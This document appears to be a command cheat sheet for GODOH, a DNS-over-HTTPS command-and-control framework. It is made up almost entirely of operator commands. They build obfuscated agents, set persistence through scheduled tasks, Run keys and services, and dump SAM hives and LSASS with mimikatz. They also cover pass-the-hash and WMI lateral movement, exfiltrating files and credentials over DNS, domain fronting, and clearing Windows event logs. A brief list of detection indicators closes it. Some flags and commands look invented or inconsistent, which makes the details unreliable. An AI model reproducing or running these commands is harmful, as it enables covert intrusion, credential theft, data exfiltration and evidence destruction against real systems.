GODOH

GODOH is a Go-based DNS-over-HTTPS (DoH) C2 framework for stealthy command exfiltration. It allows agents to communicate via DNS queries wrapped in HTTPS, evading traditional network monitoring.

Installation

Server Setup

# Clone repository
git clone https://github.com/sensepost/godoh.git
cd godoh

# Build server binary
go build -o godoh-server ./cmd/server

# Build agent binary
go build -o godoh-agent ./cmd/agent

# Alternatively, use Make
make build

Quick Start

# Start DoH server (requires DNS domain)
./godoh-server -o query.domain.com -d godoh.domain.com

# Start agent
./godoh-agent -d godoh.domain.com -c https://query.domain.com/dns-query

Server Configuration

DNS Provider Setup

# Configure for Google DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider google

# Configure for Cloudflare DoH
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -provider cloudflare

# Custom DoH endpoint
./godoh-server \
  -o query.domain.com \
  -d godoh.domain.com \
  -doh-url https://custom.example.com/dns-query

Certificate Configuration

# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Start with TLS
./godoh-server \
  -tls-cert cert.pem \
  -tls-key key.pem \
  -o query.domain.com

Agent Generation

Basic Agent

# Generate HTTP agent
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Save to binary
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -o agent.exe

Obfuscated Agent

# Build obfuscated executable
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.cloudflare.com/dns-query \
  -obfuscate \
  -o agent.exe

Cross-Platform Compilation

# Windows 64-bit
GOOS=windows GOARCH=amd64 go build -o agent.exe ./cmd/agent

# Windows 32-bit
GOOS=windows GOARCH=386 go build -o agent.exe ./cmd/agent

# Linux x86_64
GOOS=linux GOARCH=amd64 go build -o agent ./cmd/agent

# macOS
GOOS=darwin GOARCH=amd64 go build -o agent ./cmd/agent

Agent Communications

DNS Query Encoding

# Agent sends encoded data via DNS A record queries
# Example: AAAAAA.B.godoh.domain.com

# Where:
# AAAAAA = Base32-encoded command data
# B = Sequence number
# godoh.domain.com = Domain configured in agent

DoH Protocol

# Agent makes HTTPS POST to DoH endpoint
POST /dns-query HTTP/1.1
Host: dns.google
Content-Type: application/dns-message
Content-Length: 47

[Binary DNS message payload]

Response Handling

# Server returns encoded commands in DNS response
# Agent decodes response and executes commands
# Results encoded back into next DNS query

Command Execution

Shell Commands

# In agent shell
agent > execute whoami
agent > execute ipconfig /all
agent > execute tasklist /v

# PowerShell execution
agent > powershell Get-LocalUser
agent > powershell Get-Process

File Operations

# Download file from target
agent > download C:\Windows\System32\config\SAM

# Upload file to target
agent > upload /tmp/payload.exe C:\Windows\Temp\

# List directory
agent > ls C:\Users\

# Delete file
agent > rm C:\Temp\payload.exe

Process Management

# List running processes
agent > ps

# Kill process
agent > kill 1234

# Execute process
agent > execute cmd.exe /c "whoami"

# Process injection
agent > inject 1234 /tmp/shellcode.bin

Persistence Mechanisms

Scheduled Task

agent > execute schtasks /create /tn Update /tr C:\agent.exe /sc onstart /ru System

Registry Persistence

agent > execute powershell.exe -NoP -C "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update -Value C:\agent.exe"

Service Installation

agent > execute sc.exe create AgentService binPath= "C:\agent.exe"
agent > execute sc.exe start AgentService

Lateral Movement

Credentials Harvesting

# Dump LSASS
agent > execute tasklist /v | findstr lsass
agent > execute mimikatz.exe

# Dump SAM
agent > download C:\Windows\System32\config\SAM

# Extract cached creds
agent > execute powershell.exe -NoP -C "Get-ChildItem HKCU:\Software\Microsoft\Windows NT\CurrentVersion\CredentialManager"

Lateral Access

# Pass-the-Hash
agent > execute psexec -u DOMAIN\user -p hash \\target whoami

# WMI
agent > execute wmic /node:"target" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c powershell -nop -c IEX(...)"

# RDP
agent > rdesktop -u DOMAIN\user -p password target.local

Defense Evasion

Traffic Obfuscation

# Use legitimate DoH providers (Google, Cloudflare)
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query

# Blend in with normal DoH traffic
# Small query sizes reduce detection likelihood

Timing Obfuscation

# Randomize DNS query intervals
agent > sleep 3600  # 1 hour

# Use exponential backoff
agent > jitter 0.5  # 50% jitter on intervals

Payload Obfuscation

# Build obfuscated binary
go build -ldflags="-s -w" -o agent.exe ./cmd/agent

# Strip symbols for smaller size
strip agent.exe

Data Exfiltration

File Exfiltration

# Download sensitive files
agent > download C:\Users\Administrator\Desktop\secret.docx
agent > download C:\Windows\System32\config\SAM
agent > download C:\Windows\System32\config\SYSTEM

# Download results get base32-encoded into DNS queries

Credential Exfiltration

# Dump and exfil credentials
agent > execute "powershell Get-Credential | Export-Clixml C:\Temp\creds.xml"
agent > download C:\Temp\creds.xml

# Exfil via small DNS chunks
# (GODOH splits large data across multiple DNS queries)

Command Output Exfiltration

# All command output is automatically exfiltrated via DNS
agent > execute dir C:\  # Output sent in DNS responses

# Large outputs chunked:
# Server splits into 255-character DNS TXT records
# Agent reassembles responses

Monitoring and Operations

Session Management

# List active agents
server > agents

# Interact with specific agent
server > agent <agent_id>

# Send command to agent
server > task execute whoami

# Check agent status
server > status <agent_id>

Log Review

# Enable verbose logging
./godoh-server -v -d godoh.domain.com

# Monitor incoming queries
./godoh-server -log /tmp/godoh.log -d godoh.domain.com

# Check DNS query patterns
tail -f /tmp/godoh.log | grep "DNS Query"

Performance Optimization

# Adjust buffer sizes for slow connections
./godoh-server \
  -buffer-size 512 \
  -d godoh.domain.com

# Increase timeout for unreliable networks
./godoh-agent \
  -d godoh.domain.com \
  -timeout 30s

Advanced Configuration

Domain Fronting

# Use legitimate domain for DoH endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.google/dns-query \
  -host-header google.com

# Hides true C2 domain in SNI/Host header

Multi-Domain Setup

# Configure multiple fallback domains
./godoh-agent \
  -d primary.domain.com,secondary.domain.com,tertiary.domain.com \
  -c https://dns.google/dns-query

# Rotates between domains for resilience

Custom DNS Server

# Run internal DNS server
./godoh-dns-server -d godoh.domain.com

# Route queries to custom server
./godoh-agent \
  -d godoh.domain.com \
  -nameserver 192.168.1.10:53

Troubleshooting

Connectivity Issues

# Test DNS resolution
nslookup test.godoh.domain.com

# Test DoH endpoint
curl -X POST https://dns.google/dns-query \
  -H "Content-Type: application/dns-message"

# Enable debug logging
./godoh-agent -debug -d godoh.domain.com

Slow Transfers

# Increase query rate
./godoh-agent \
  -d godoh.domain.com \
  -rate 100  # 100 queries per second

# Reduce data encoding overhead
./godoh-agent -compression gzip

Firewall Blocking

# If standard DoH blocked, use alternative endpoint
./godoh-agent \
  -d godoh.domain.com \
  -c https://dns.quad9.net/dns-query

# Alternative: use TCP port 853
./godoh-server -tcp -port 853

Detection and Cleanup

Remove Agent

# Remove scheduled task
agent > execute schtasks /delete /tn Update /f

# Remove registry entry
agent > execute powershell.exe -NoP -C "Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update"

# Delete agent binary
agent > rm C:\Windows\Temp\agent.exe

Clear Logs

# Clear Windows Event Log
agent > execute wevtutil cl System
agent > execute wevtutil cl Security
agent > execute wevtutil cl Application

# Clear DNS cache
agent > execute ipconfig /flushdns

Best Practices

Use legitimate DoH providers to blend with normal traffic
Implement DNS query randomization
Rotate domains regularly
Monitor for unusual DNS patterns
Use encryption for additional obfuscation
Implement proper OPSEC during operations
Clean up all artifacts post-operation

Detection Indicators

Unusual DNS query volume
Consistent DoH traffic to unusual endpoints
Base32/Base64-encoded DNS names
Regular DNS query timing patterns
Outbound HTTPS traffic on port 443 to unexpected IPs

GODOH

Installation

Server Setup

Quick Start

Server Configuration

DNS Provider Setup

Certificate Configuration

Agent Generation

Basic Agent

Obfuscated Agent

Cross-Platform Compilation

Agent Communications

DNS Query Encoding

DoH Protocol

Response Handling

Command Execution

Shell Commands

File Operations

Process Management

Persistence Mechanisms

Scheduled Task

Registry Persistence

Service Installation

Lateral Movement

Credentials Harvesting

Lateral Access

Defense Evasion

Traffic Obfuscation

Timing Obfuscation

Payload Obfuscation

Data Exfiltration

File Exfiltration

Credential Exfiltration

Command Output Exfiltration

Monitoring and Operations

Session Management

Log Review

Performance Optimization

Advanced Configuration

Domain Fronting

Multi-Domain Setup

Custom DNS Server

Troubleshooting

Connectivity Issues

Slow Transfers

Firewall Blocking

Detection and Cleanup

Remove Agent

Clear Logs

Best Practices

Detection Indicators

References